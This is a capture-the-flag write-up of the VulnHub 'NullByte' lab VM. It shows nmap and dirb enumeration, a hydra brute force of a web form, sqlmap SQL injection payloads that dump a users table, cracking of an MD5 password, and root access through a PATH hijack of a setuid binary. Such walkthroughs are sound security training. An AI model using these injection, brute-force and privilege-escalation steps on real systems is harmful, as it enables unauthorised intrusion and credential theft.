NullByte
Location
https://download.vulnhub.com/nullbyte/NullByte.ova.zip
Description
Objective: Get to /root/proof.txt and follow the instructions.
Level: Basic to intermediate.
Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.
Hints: Use your lateral thinking skills, maybe you’ll need to write some code.
Enumeration
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.110.4 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-08 11:49 CEST Nmap scan report for 192.168.110.4 Host is up (0.00064s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Null Byte 00 - level 1 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 43405/udp status |_ 100024 1 53410/tcp status 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA) | 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA) |_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA) 53410/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds |
Let’s start with port 80.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -v http://192.168.110.4/ * Trying 192.168.110.4... * Connected to 192.168.110.4 (192.168.110.4) port 80 (#0) > GET / HTTP/1.1 > Host: 192.168.110.4 > User-Agent: curl/7.50.1 > Accept: */* > < HTTP/1.1 200 OK < Date: Thu, 08 Sep 2016 11:52:05 GMT < Server: Apache/2.4.10 (Debian) < Last-Modified: Sat, 01 Aug 2015 16:44:18 GMT < ETag: "c4-51c42a5c32a70" < Accept-Ranges: bytes < Content-Length: 196 < Vary: Accept-Encoding < Content-Type: text/html < <html> <head><title>Null Byte 00 - level 1</title></head> <body> <center> <img src="main.gif"> <p> If you search for the laws of harmony, you will find knowledge. </p> </center> </body> </html> * Connection #0 to host 192.168.110.4 left intact |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
┌─[n13mant@planetmars]─[~] └──╼ $dirb http://192.168.110.4/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Sep 8 11:53:59 2016 URL_BASE: http://192.168.110.4/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.110.4/ ---- + http://192.168.110.4/index.html (CODE:200|SIZE:196) ==> DIRECTORY: http://192.168.110.4/javascript/ ==> DIRECTORY: http://192.168.110.4/phpmyadmin/ + http://192.168.110.4/server-status (CODE:403|SIZE:301) ==> DIRECTORY: http://192.168.110.4/uploads/ -----SNIP----- |
Next I downloaded the main.gif file and examine it with exiftool. There was a password-like piece inside as comment: “P-): kzMb5nVYJw”. Was it a password for the phpMyAdmin site or something else? A simple try was to append it to the URL and the result was satisfying.
|
1 2 3 4 5 6 7 8 9 |
┌─[n13mant@planetmars]─[~] └──╼ $curl http://192.168.110.4/kzMb5nVYJw/ <center> <form method="post" action="index.php"> Key:<br> <input type="password" name="key"> </form> </center> <!-- this form isn't connected to mysql, password ain't that complex --!> |
The password is not that complex, but after a few tries I decided to let hydra do this tiresome job.
|
1 2 3 4 5 6 7 |
┌─[n13mant@planetmars]─[~] └──╼ $hydra -f 192.168.110.4 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l "" -P /usr/share/wordlists/english_words/words.dic Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. -----SNIP----- [DATA] attacking service http-post-form on port 80 [80][http-post-form] host: 192.168.110.4 password: elite 1 of 1 target successfully completed, 1 valid password found |
|
1 2 3 4 5 6 7 8 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/index.php <p>Search for usernames: </p> <hr> <form action="420search.php" method="get"> Enter username:<br> <input type="text" name="usrtosearch"> </form> |
|
1 2 3 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/420search.php EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully |
A database. First some manual tries, but after a while I decided to put my faith in sqlmap.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
┌─[n13mant@planetmars]─[~] └──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbs _ ___ ___| |_____ ___ ___ {1.0.8.2#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 13:20:24 -----SNIP----- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND 8757=8757# Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162787671,(SELECT (ELT(6320=6320,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- PfDF Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND SLEEP(5)-- IEfZ Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" UNION ALL SELECT CONCAT(0x7162787671,0x4772734e5241706d774a6f734c53427a57414870547246534a69794b454d447665754461756c7778,0x717a767a71),NULL,NULL# --- [13:20:51] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.5 [13:20:51] [INFO] fetching database names available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] seth |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
┌─[n13mant@planetmars]─[~] └──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth --tables -----SNIP----- [13:24:00] [INFO] fetching tables for database: 'seth' Database: seth [1 table] +-------+ | users | +-------+ ┌─[n13mant@planetmars]─[~] └──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth -T users --dump -----SNIP----- [13:24:14] [INFO] fetching columns for table 'users' in database 'seth' [13:24:14] [INFO] fetching entries for table 'users' in database 'seth' [13:24:14] [INFO] analyzing table dump for possible password hashes Database: seth Table: users [2 entries] +----+---------------------------------------------+--------+------------+ | id | pass | user | position | +----+---------------------------------------------+--------+------------+ | 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> | | 2 | --not allowed-- | isis | employee | +----+---------------------------------------------+--------+------------+ |
I guess the isis user will be the goal to elevate to when inside the machine. The string from ramses looks like base64 to me.
|
1 2 3 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=' | base64 -d c6d6bd7ebf806f43c76acc3681703b81 |
And that looks like a md5 hash.
|
1 2 3 4 5 6 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $findmyhash MD5 -h c6d6bd7ebf806f43c76acc3681703b81 -----SNIP----- The following hashes were cracked: ---------------------------------- c6d6bd7ebf806f43c76acc3681703b81 -> omega |
Let’s see if this will grant some access to the server.
|
1 2 3 4 5 6 7 8 9 10 |
┌─[n13mant@planetmars]─[~] └──╼ $ssh ramses@192.168.110.4 -p 777 ramses@192.168.110.4's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109 ramses@NullByte:~$ |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
ramses@NullByte:~$ id uid=1002(ramses) gid=1002(ramses) groups=1002(ramses) ramses@NullByte:~$ sudo -l [sudo] password for ramses: Sorry, user ramses may not run sudo on NullByte. ramses@NullByte:/home$ ls -lah total 20K drwxr-xr-x 5 root root 4.0K Aug 2 2015 . drwxr-xr-x 21 root root 4.0K Aug 1 2015 .. drwxr-xr-x 2 bob bob 4.0K Aug 2 2015 bob drwxr-xr-x 2 eric eric 4.0K Aug 2 2015 eric drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 ramses |
bob and eric? Not the kind of names I would have expected.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
ramses@NullByte:/home$ ls -aRl bob bob: total 20 drwxr-xr-x 2 bob bob 4096 Aug 2 2015 . drwxr-xr-x 5 root root 4096 Aug 2 2015 .. -rw-r--r-- 1 bob bob 220 Aug 2 2015 .bash_logout -rw-r--r-- 1 bob bob 3515 Aug 2 2015 .bashrc -rw-r--r-- 1 bob bob 675 Aug 2 2015 .profile ramses@NullByte:/home$ ls -aRl eric eric: total 24 drwxr-xr-x 2 eric eric 4096 Aug 2 2015 . drwxr-xr-x 5 root root 4096 Aug 2 2015 .. -rw------- 1 eric eric 545 Aug 2 2015 .bash_history -rw-r--r-- 1 eric eric 220 Aug 2 2015 .bash_logout -rw-r--r-- 1 eric eric 3515 Aug 2 2015 .bashrc -rw-r--r-- 1 eric eric 675 Aug 2 2015 .profile ramses@NullByte:/home$ ls -aRl ramses ramses: total 24 drwxr-xr-x 2 ramses ramses 4096 Aug 2 2015 . drwxr-xr-x 5 root root 4096 Aug 2 2015 .. -rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history -rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout -rw-r--r-- 1 ramses ramses 3515 Aug 2 2015 .bashrc -rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile ramses@NullByte:/home$ cat /home/ramses/.bash_history sudo -s su eric exit ls clear cd /var/www cd backup/ ls ./procwatch clear sudo -s cd / ls exit |
A backup folder in /var/www.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
ramses@NullByte:/home$ cd /var/www/ ramses@NullByte:/var/www$ ls -lah total 16K drwxr-xr-x 4 root root 4.0K Aug 2 2015 . drwxr-xr-x 12 root root 4.0K Aug 2 2015 .. drwxrwxrwx 2 root root 4.0K Aug 2 2015 backup drwxr-xr-x 4 root root 4.0K Aug 2 2015 html ramses@NullByte:/var/www$ cd backup ramses@NullByte:/var/www/backup$ ls -lh total 12K -rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch -rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt ramses@NullByte:/var/www/backup$ ls -lah total 20K drwxrwxrwx 2 root root 4.0K Aug 2 2015 . drwxr-xr-x 4 root root 4.0K Aug 2 2015 .. -rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch -rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt ramses@NullByte:/var/www/backup$ cat readme.txt I have to fix this mess... |
What mess?
|
1 2 3 4 5 |
ramses@NullByte:/var/www/backup$ ./procwatch PID TTY TIME CMD 1679 pts/0 00:00:00 procwatch 1680 pts/0 00:00:00 sh 1681 pts/0 00:00:00 ps |
Looks like it runs ps as root, but without an absolute path.
|
1 2 |
ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps ramses@NullByte:/var/www/backup$ export PATH=`pwd`:${PATH} |
I made a symbolic link to /bin/sh and called it ps. Then I set PATH to my current location.
Now it’s time to run procwatch again.
|
1 2 3 |
ramses@NullByte:/var/www/backup$ ./procwatch # id uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses) |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
# cd /root # ls proof.txt # cat proof.txt adf11c7a9e6523e630aaf3b9b7acb51d It seems that you have pwned the box, congrats. Now you done that I wanna talk with you. Write a walk & mail at xly0n@sigaint.org attach the walk and proof.txt If sigaint.org is down you may mail at nbsly0n@gmail.com USE THIS PGP PUBLIC KEY -----BEGIN PGP PUBLIC KEY BLOCK----- Version: BCPG C# v1.6.1.0 mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK +z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58 kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8 TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU Gms= =PiAQ -----END PGP PUBLIC KEY BLOCK----- |
Conclusion
This was a cool challenge. I had fun and learned new stuff.
Thanks to ly0n for making this one available.